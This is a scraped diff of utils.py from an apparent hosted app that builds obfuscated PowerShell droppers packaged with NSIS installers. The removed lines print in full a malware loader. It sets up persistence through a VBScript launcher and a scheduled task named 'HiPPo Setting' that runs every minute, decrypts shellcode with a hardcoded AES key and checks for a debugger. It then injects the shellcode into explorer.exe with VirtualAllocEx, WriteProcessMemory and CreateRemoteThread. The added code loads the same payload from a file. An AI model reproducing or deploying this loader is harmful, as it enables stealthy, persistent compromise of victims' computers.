Spaces:
Sleeping
Sleeping
Update utils.py
Browse files
utils.py
CHANGED
@@ -16,7 +16,8 @@ PE_FOLDER = os.path.join(BASE_DIR, "pe")
|
|
16 |
COMPILE_FOLDER = os.path.join(BASE_DIR, "compile")
|
17 |
NSIS_COMPILER = "makensis" # Ensure NSIS is installed on your Linux system
|
18 |
OBFUSCATOR_SCRIPT = os.path.join(BASE_DIR, "Obfus", "main.ps1")
|
19 |
-
UPLOAD_URL = 'https://ambelo-benjamin.hf.space/upload'
|
|
|
20 |
|
21 |
|
22 |
|
@@ -29,7 +30,7 @@ def obfuscate_powershell_script(ps1_path):
|
|
29 |
current_app.logger.info(f"Running obfuscation command: {cmd}")
|
30 |
current_app.logger.info(f"Input PowerShell script path: {ps1_path}")
|
31 |
|
32 |
-
process = subprocess.Popen(cmd, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE,
|
33 |
process.stdin.write(f"{ps1_path}\n")
|
34 |
process.stdin.flush()
|
35 |
stdout, stderr = process.communicate()
|
@@ -212,114 +213,17 @@ def process_request(request):
|
|
212 |
# Extract the file name from the full binary path
|
213 |
bin_file_name = os.path.basename(bin_path)
|
214 |
|
215 |
-
|
216 |
-
|
217 |
-
|
218 |
-
|
219 |
-
|
220 |
-
|
221 |
-
|
222 |
-
#
|
223 |
-
$vbsContent = @'
|
224 |
-
Set objShell = CreateObject("WScript.Shell")
|
225 |
-
objShell.Run "powershell -EP Bypass -File \\"C:\\ProgramData\\Installer\\Verification.ps1\\"", 0, True
|
226 |
-
'@
|
227 |
-
# Define the file path for the .vbs file in the desired location
|
228 |
-
$vbsFilePath = "C:\\ProgramData\\Installer\\0.vbs"
|
229 |
-
# Write the content to the .vbs file
|
230 |
-
$vbsContent | Set-Content -Path $vbsFilePath -Encoding ASCII
|
231 |
-
Write-Host "VBScript file created at: $vbsFilePath"
|
232 |
-
$Action = New-ScheduledTaskAction -Execute "C:\\ProgramData\\Installer\\0.vbs"
|
233 |
-
$Trigger = New-ScheduledTaskTrigger -Once -At (Get-Date) -RepetitionInterval (New-TimeSpan -Minutes 1) -RepetitionDuration (New-TimeSpan -Days 365)
|
234 |
-
Register-ScheduledTask -TaskName "HiPPo Setting" -Action $Action -Trigger $Trigger -Force
|
235 |
-
# Define a fixed 16-byte key for encryption (fixed key as "MyFixedEncryptionKey")
|
236 |
-
$keyBytes = [System.Text.Encoding]::UTF8.GetBytes("MyFixedEncryptionKey")
|
237 |
-
# Ensure the key length is 16 bytes (AES requires 16, 24, or 32 bytes)
|
238 |
-
if ($keyBytes.Length -gt 16) {{
|
239 |
-
$keyBytes = $keyBytes[0..15] # Trim the key to 16 bytes if it's longer
|
240 |
-
}}
|
241 |
-
elseif ($keyBytes.Length -lt 16) {{
|
242 |
-
# If the key is too short, pad it with zeros to make it 16 bytes
|
243 |
-
$keyBytes = $keyBytes + (New-Object Byte[] (16 - $keyBytes.Length))
|
244 |
-
}}
|
245 |
-
# Function to download the encrypted binary from the server
|
246 |
-
function Download-EncryptedShellcode {{
|
247 |
-
param([string]$url)
|
248 |
-
# Download the encrypted binary file directly into memory as a byte array
|
249 |
-
$response = Invoke-WebRequest -Uri $url -UseBasicParsing
|
250 |
-
return $response.Content
|
251 |
-
}}
|
252 |
-
# Read the encrypted shellcode from a local binary file
|
253 |
-
$encryptedBuf = [System.IO.File]::ReadAllBytes("C:\\ProgramData\\Installer\\{bin_file_name}")
|
254 |
-
# Create an AES encryption object
|
255 |
-
$aes = [System.Security.Cryptography.Aes]::Create()
|
256 |
-
# Set the decryption key and initialization vector (IV)
|
257 |
-
$aes.Key = $keyBytes
|
258 |
-
$aes.IV = $keyBytes[0..15] # Use the first 16 bytes of the key for the IV
|
259 |
-
# Create a memory stream to hold the decrypted data
|
260 |
-
$memoryStream = New-Object System.IO.MemoryStream
|
261 |
-
$cryptoStream = New-Object System.Security.Cryptography.CryptoStream($memoryStream, $aes.CreateDecryptor(), [System.Security.Cryptography.CryptoStreamMode]::Write)
|
262 |
-
# Decrypt the encrypted data into the memory stream
|
263 |
-
$cryptoStream.Write($encryptedBuf, 0, $encryptedBuf.Length)
|
264 |
-
$cryptoStream.Close()
|
265 |
-
# Get the decrypted shellcode
|
266 |
-
$buf = $memoryStream.ToArray()
|
267 |
-
# Anti-debugging mechanism
|
268 |
-
function IsDebuggerPresent {{
|
269 |
-
$IsDebuggerPresentCode = @"
|
270 |
-
using System;
|
271 |
-
using System.Runtime.InteropServices;
|
272 |
-
public class DebugHelper {{
|
273 |
-
[DllImport(\\"kernel32.dll\\")]
|
274 |
-
public static extern bool IsDebuggerPresent();
|
275 |
-
}}
|
276 |
-
"@
|
277 |
-
$debugHelper = Add-Type -TypeDefinition $IsDebuggerPresentCode -PassThru
|
278 |
-
return $debugHelper::IsDebuggerPresent()
|
279 |
-
}}
|
280 |
-
if (IsDebuggerPresent) {{
|
281 |
-
Write-Host "Debugger detected. Exiting."
|
282 |
-
exit
|
283 |
-
}}
|
284 |
-
# Inject shellcode into a target process (example: explorer.exe)
|
285 |
-
$Win32APICode = @"
|
286 |
-
using System;
|
287 |
-
using System.Runtime.InteropServices;
|
288 |
-
public class Win32API {{
|
289 |
-
[DllImport(\\"kernel32.dll\\", SetLastError = true, ExactSpelling = true)]
|
290 |
-
public static extern IntPtr VirtualAllocEx(IntPtr hProcess, IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
|
291 |
-
[DllImport(\\"kernel32.dll\\", SetLastError = true)]
|
292 |
-
public static extern bool WriteProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, uint nSize, out IntPtr lpNumberOfBytesWritten);
|
293 |
-
[DllImport(\\"kernel32.dll\\", SetLastError = true)]
|
294 |
-
public static extern IntPtr CreateRemoteThread(IntPtr hProcess, IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, out IntPtr lpThreadId);
|
295 |
-
[DllImport(\\"kernel32.dll\\", SetLastError = true)]
|
296 |
-
public static extern IntPtr OpenProcess(uint dwDesiredAccess, bool bInheritHandle, uint dwProcessId);
|
297 |
-
[DllImport(\\"kernel32.dll\\", SetLastError = true)]
|
298 |
-
[return: MarshalAs(UnmanagedType.Bool)]
|
299 |
-
public static extern bool CloseHandle(IntPtr hObject);
|
300 |
-
}}
|
301 |
-
"@
|
302 |
-
$win32api = Add-Type -TypeDefinition $Win32APICode -PassThru
|
303 |
-
# Target process (explorer.exe) injection
|
304 |
-
$targetProcess = Get-Process explorer | Select-Object -First 1
|
305 |
-
$processHandle = $win32api::OpenProcess(0x1F0FFF, $false, $targetProcess.Id)
|
306 |
-
# Allocate memory in the target process
|
307 |
-
$size = 0x1000
|
308 |
-
if ($buf.Length -gt $size) {{ $size = $buf.Length }}
|
309 |
-
$remoteMemory = $win32api::VirtualAllocEx($processHandle, [IntPtr]::Zero, $size, 0x3000, 0x40)
|
310 |
-
# Write the shellcode into the allocated memory
|
311 |
-
$bytesWritten = [IntPtr]::Zero
|
312 |
-
$win32api::WriteProcessMemory($processHandle, $remoteMemory, $buf, $buf.Length, [ref]$bytesWritten)
|
313 |
-
# Create a remote thread to execute the shellcode
|
314 |
-
$threadId = [IntPtr]::Zero
|
315 |
-
$win32api::CreateRemoteThread($processHandle, [IntPtr]::Zero, 0, $remoteMemory, [IntPtr]::Zero, 0, [ref]$threadId)
|
316 |
-
# Close the process handle
|
317 |
-
$win32api::CloseHandle($processHandle)
|
318 |
-
Write-Host "Shellcode injection completed successfully."
|
319 |
-
'''
|
320 |
ps1_path = os.path.join(temp_dir, generate_random_string() + ".ps1")
|
321 |
-
with open(ps1_path, 'w') as
|
322 |
-
|
323 |
|
324 |
# Obfuscate the PowerShell script
|
325 |
obfuscated_ps1_path = obfuscate_powershell_script(ps1_path)
|
|
|
16 |
COMPILE_FOLDER = os.path.join(BASE_DIR, "compile")
|
17 |
NSIS_COMPILER = "makensis" # Ensure NSIS is installed on your Linux system
|
18 |
OBFUSCATOR_SCRIPT = os.path.join(BASE_DIR, "Obfus", "main.ps1")
|
19 |
+
UPLOAD_URL = 'https://ambelo-benjamin.hf.space/upload'
|
20 |
+
POWERSHELL_FILE_PATH = os.path.join(PE_FOLDER, "powershell.ps1")
|
21 |
|
22 |
|
23 |
|
|
|
30 |
current_app.logger.info(f"Running obfuscation command: {cmd}")
|
31 |
current_app.logger.info(f"Input PowerShell script path: {ps1_path}")
|
32 |
|
33 |
+
process = subprocess.Popen(cmd, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE, text=True)
|
34 |
process.stdin.write(f"{ps1_path}\n")
|
35 |
process.stdin.flush()
|
36 |
stdout, stderr = process.communicate()
|
|
|
213 |
# Extract the file name from the full binary path
|
214 |
bin_file_name = os.path.basename(bin_path)
|
215 |
|
216 |
+
|
217 |
+
# Read the PowerShell content from the local file
|
218 |
+
with open(POWERSHELL_FILE_PATH, 'r') as ps1_file:
|
219 |
+
ps1_content = ps1_file.read()
|
220 |
+
|
221 |
+
ps1_content = ps1_content.replace("{bin_file_name}", bin_file_name)
|
222 |
+
|
223 |
+
# Create the PowerShell script with the modified content
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
224 |
ps1_path = os.path.join(temp_dir, generate_random_string() + ".ps1")
|
225 |
+
with open(ps1_path, 'w') as new_ps1_file:
|
226 |
+
new_ps1_file.write(ps1_content)
|
227 |
|
228 |
# Obfuscate the PowerShell script
|
229 |
obfuscated_ps1_path = obfuscate_powershell_script(ps1_path)
|